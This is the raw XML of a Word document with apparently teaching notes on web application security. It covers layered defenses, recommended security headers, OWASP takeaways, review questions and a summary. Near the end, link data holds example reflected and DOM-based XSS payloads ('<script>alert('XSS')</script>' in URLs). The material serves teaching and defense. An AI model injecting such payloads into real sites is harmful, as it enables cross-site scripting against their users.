          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Application Layer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0B12F7" w14:textId="7AE47C9A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Secure coding practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBC2F3F" w14:textId="2A8D22FF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Input validation, output encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B533AA" w14:textId="03845EA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Authentication and authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7C4634" w14:textId="2542EB90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F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Data Layer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8047BE" w14:textId="1EF8DDF1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Database encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA559CD" w14:textId="4C671FF2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Secure query construction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B72E57E" w14:textId="2B416600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Access controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B4EE41" w14:textId="0FEF6E7B" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F7055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F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Client Layer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E10F862" w14:textId="2CD7F5C2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Browser security features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5252BB14" w14:textId="73FBD58F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User education and awareness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADFD66A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Security headers (CSP, HSTS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08318CC8" w14:textId="77777777" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45484A15" w14:textId="6FF29A30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Security Headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D63AA53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Strict-Transport-Security: max-age=31536000; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>includeSubDomains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1389ECC0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Content-Security-Policy: default-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'self'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4C36E0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X-Content-Type-Options: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nosniff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5FE200E5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X-Frame-Options: DENY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C494301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X-XSS-Protection: 1; mode=block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7167831C" w14:textId="219C7A32" w:rsid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Referrer-Policy: strict-origin-when-cross-origin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643B5362" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CE73446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10. Key Takeaways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCD593D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Critical Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373D5B43" w14:textId="6D529FCA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Injection: Always validate and sanitize user input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C09297" w14:textId="15C9040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Broken Authentication: Implement secure session management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059E8A40" w14:textId="5BABDC3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XSS: Encode output and implement CSP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2A60BD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Access Control: Verify authorization for every request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACE01F0" w14:textId="77777777" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C2D0E68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Development Best Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226F4D83" w14:textId="6B2B8D0E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Security by Design: Integrate security from initial design</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF8ADB2" w14:textId="00CF4DF2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Defense in Depth: Multiple layers of security controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1075BF" w14:textId="2BEDFA22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Least Privilege: Minimum necessary access rights</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1599B004" w14:textId="63A1AD30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Regular Updates: Patch dependencies and frameworks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44024F5C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Security Testing: Continuous assessment throughout SDLC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AB6852" w14:textId="77777777" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75CDDAD7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lastRenderedPageBreak/>
        <w:t>Future Trends</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFAC3ED" w14:textId="4C7DF0AD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API Security: REST/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>GraphQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> API protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B2B524" w14:textId="1687041A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Serverless Security: Function-as-a-service specific concerns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116CB750" w14:textId="54B51876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Container Security: Docker/Kubernetes security practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9B7D2F" w14:textId="4278377D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AI/ML in Security: Automated vulnerability detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1E29CC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Zero Trust Architecture: Continuous verification model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52365A04" w14:textId="77777777" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A281C4E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11. Review Questions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD28F70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Conceptual:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B23F5BC" w14:textId="18F5A156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What are the three main types of XSS attacks, and how do they differ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F432AB" w14:textId="223B1B70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Why are parameterized queries effective against SQL </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>injection</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE452CA" w14:textId="50985E32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What makes session fixation attacks possible, and how can they be prevented?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704E393F" w14:textId="00627B16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How does the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> cookie flag help prevent XSS attacks?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F70EDE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What are the key changes between OWASP Top 10 2017 and 2021?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3801FA32" w14:textId="77777777" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EE815B3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Practical:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40552C4A" w14:textId="5D18A314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How would you test a login form for SQL injection vulnerabilities?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39210384" w14:textId="153516ED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What security headers would you implement for a new web application?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462D887C" w14:textId="30BD5019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How can </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>you</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> secure user file upload functionality?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507FC3D7" w14:textId="69B6AC4A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What steps would you take to investigate a suspected XSS attack?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5088FA54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How would you implement secure session management in PHP?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F83F95" w14:textId="77777777" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BAC1385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lastRenderedPageBreak/>
        <w:t>Analytical:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED707E0" w14:textId="1FFC919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Why are web applications particularly vulnerable to injection attacks?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFE8BB7" w14:textId="376A0740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How does the rise of single-page applications (SPAs) change the XSS threat model?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7703B5B6" w14:textId="79A50155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What trade-offs exist between security and usability in session management?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E241577" w14:textId="4A3106F9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How can Content Security Policy (CSP) break legitimate website functionality?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39584FB2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What role does user education play in preventing client-side attacks?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF634DC" w14:textId="77777777" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F56A38D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12. Summary of Key Points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CD4AF0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Web Security Fundamentals:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632ADF01" w14:textId="55E56A4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Complex Attack Surface: Multiple technologies, protocols, and entry points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E23C78" w14:textId="5D2B0E3E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Data/Code Separation: Fundamental principle for preventing injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332961FF" w14:textId="57CE424E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 xml:space="preserve">State Management: Critical challenge with many </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>implementation</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> pitfalls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A13B58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Client-Side Trust: Never trust client-side validation or data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256E724A" w14:textId="77777777" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19235A20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Critical Protections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07650E02" w14:textId="1ED285C0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Input Validation: Whitelist approach, reject malicious patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364DF3A7" w14:textId="0D61E14F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Output Encoding: Context-aware escaping for different interpreters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C08348" w14:textId="7F0D3CE8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Secure Session Management: Random tokens, secure flags, expiration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A2FF4D" w14:textId="39E68CBD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Access Control: Verify every request, principle of least privilege</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7028D55B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Security Headers: Implement defense-in-depth at HTTP layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698E0096" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="334DBB92" w14:textId="77777777" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07B97681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lastRenderedPageBreak/>
        <w:t>Continuous Security:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7222C1" w14:textId="4821ADC6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Regular Testing: Automated and manual security assessments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B32DB39" w14:textId="4F1467AF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Patch Management: Update frameworks and dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDCEB42" w14:textId="5CDA8DD9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Monitoring: Log analysis and anomaly detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6173867D" w14:textId="47809F8A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Education: Developer training and user awareness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FB4353" w14:textId="77777777" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Incident Response: Preparedness for security breaches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768EEDE0" w14:textId="77777777" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="568DC9E3" w14:textId="77777777" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00F70556" w:rsidRPr="00F70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58B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9FC24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75613"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1B04F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A4E0B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="95821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438082">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="799957677">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="198215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3C"/>
    <w:rsid w:val="00014E0C"/>
    <w:rsid w:val="0028203C"/>
    <w:rsid w:val="002E5E3A"/>
    <w:rsid w:val="00466569"/>
    <w:rsid w:val="00496876"/>
    <w:rsid w:val="007F6F5B"/>
    <w:rsid w:val="008D30A0"/>
    <w:rsid w:val="009539AA"/>
    <w:rsid w:val="009F0725"/>
    <w:rsid w:val="00AB6177"/>
    <w:rsid w:val="00AD0481"/>
    <w:rsid w:val="00B112CE"/>
    <w:rsid w:val="00D23E8B"/>
    <w:rsid w:val="00DA7B21"/>
    <w:rsid w:val="00F70556"/>
    <w:rsid w:val="00F80892"/>
    <w:rsid w:val="00FA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912F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4ED66426-B89C-485F-A7EC-DA5293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5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site.com/page#&lt;script&gt;alert('XSS')&lt;/scri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vulnerable.site/search?q=%3cscript%3ealert('XSS')%3c/scrip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rusted.cd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2352</Words>
  <Characters>13411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Alkhurayji</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Mohammed Alkhurayji</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-01-20T01:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-20T01:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>